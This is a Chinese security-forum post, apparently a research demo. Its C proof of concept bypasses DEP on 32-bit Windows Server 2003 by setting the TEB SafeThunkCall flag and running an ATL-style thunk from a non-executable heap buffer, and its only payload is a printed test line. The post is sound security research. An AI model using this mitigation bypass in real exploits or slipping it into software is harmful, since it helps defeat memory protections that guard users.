[原创]windows 2003 dep 鸡肋 bypass DEMO
原理参考
http://bbs.pediy.com/showthread.php?t=172034
#include <Windows.h>
#include <conio.h>   /* getch */
#include <stdio.h>
#include <stdlib.h>  /* malloc, free */
#include <string.h>  /* memset, memcpy */
/*
 * Landing pad for the demo thunk. The heap-resident thunk in main()
 * reaches this function with a `jmp` (not a `call`), so the `ret`
 * emitted at the end of this function returns straight into main().
 * Its only observable effect is the line printed below.
 */
void dep_bypass(void)
{
    puts("dep_bypass test ok!");
}
/*
* windows dep bypass by boywhp@126.com
* http://bbs.pediy.com/showthread.php?t=172034
*/
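/*
 * Demo entry point: builds an ATL "thunk 2" (mov ecx, imm32; jmp rel32) in an
 * ordinary malloc'd heap buffer and calls into it WITHOUT ever making the page
 * executable (no VirtualProtect). The jump target is dep_bypass(), which returns
 * straight back here because the thunk uses jmp rather than call.
 *
 * Scope: Windows Server 2003, x86 only. The thunk byte layout, the DWORD casts
 * of pointers and the TEB field offset are all 32-bit specific; on any other
 * target this code is simply wrong, not merely unsupported.
 *
 * NOTE(review): the original author sets the byte at TEB offset 0xfb8, which
 * they identify as TEB->SafeThunkCall on this OS, and reports that the kernel's
 * DEP/ATL-thunk emulation then lets the non-executable thunk run. Confirm the
 * offset against `dt nt!_TEB` for the exact build before reusing it. Because
 * code must already be running inside the process to write the TEB and lay out
 * the thunk, this is a demonstration of a DEP weakness, not a standalone
 * exploitation primitive (hence the "鸡肋" / "of limited use" label in the
 * title).
 *
 * Returns 0 on success, 1 if the heap buffer could not be allocated.
 */
int main(int argc, char** argv)
{
    enum {
        THUNK_BUF_SIZE      = 0x200, /* heap buffer: thunk + NOP padding */
        THUNK_LEN           = 10,    /* mov ecx,imm32 (5 bytes) + jmp rel32 (5 bytes) */
        TEB_SAFE_THUNK_CALL = 0xfb8  /* TEB->SafeThunkCall, Windows 2003 x86 (verify) */
    };
    PBYTE thunk;
    PBYTE teb;
    DWORD target = (DWORD)dep_bypass;
    DWORD rel32;
    ULONG ecx_imm = 0xcccc;        /* arbitrary imm32; dep_bypass ignores ecx */

    (void)argc;
    (void)argv;

    thunk = malloc(THUNK_BUF_SIZE);
    if (thunk == NULL) {
        printf("malloc error!\n");
        return 1;
    }

    /*
     * Deliberately NO VirtualProtect(thunk, ..., PAGE_EXECUTE_READWRITE):
     * the whole point of the demo is that the page stays non-executable.
     */

    /* TEB self pointer, i.e. FS:[0x18]; same read as the original inline asm. */
    teb = (PBYTE)NtCurrentTeb();
    teb[TEB_SAFE_THUNK_CALL] = TRUE;

    /* jmp rel32 is relative to the end of the jmp, which is thunk + THUNK_LEN. */
    rel32 = target - ((DWORD)thunk + THUNK_LEN);

    memset(thunk, 0x90, THUNK_BUF_SIZE);          /* NOP fill; never executed */
    thunk[0] = 0xb9;                              /* mov ecx, imm32 */
    memcpy(thunk + 1, &ecx_imm, sizeof ecx_imm);  /* memcpy: avoid unaligned PULONG store */
    thunk[5] = 0xe9;                              /* jmp rel32 */
    memcpy(thunk + 6, &rel32, sizeof rel32);

    ((void(*)(void))thunk)();                     /* dep_bypass() prints and returns here */

    free(thunk);
    getch();
    return 0;
}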
有图有真相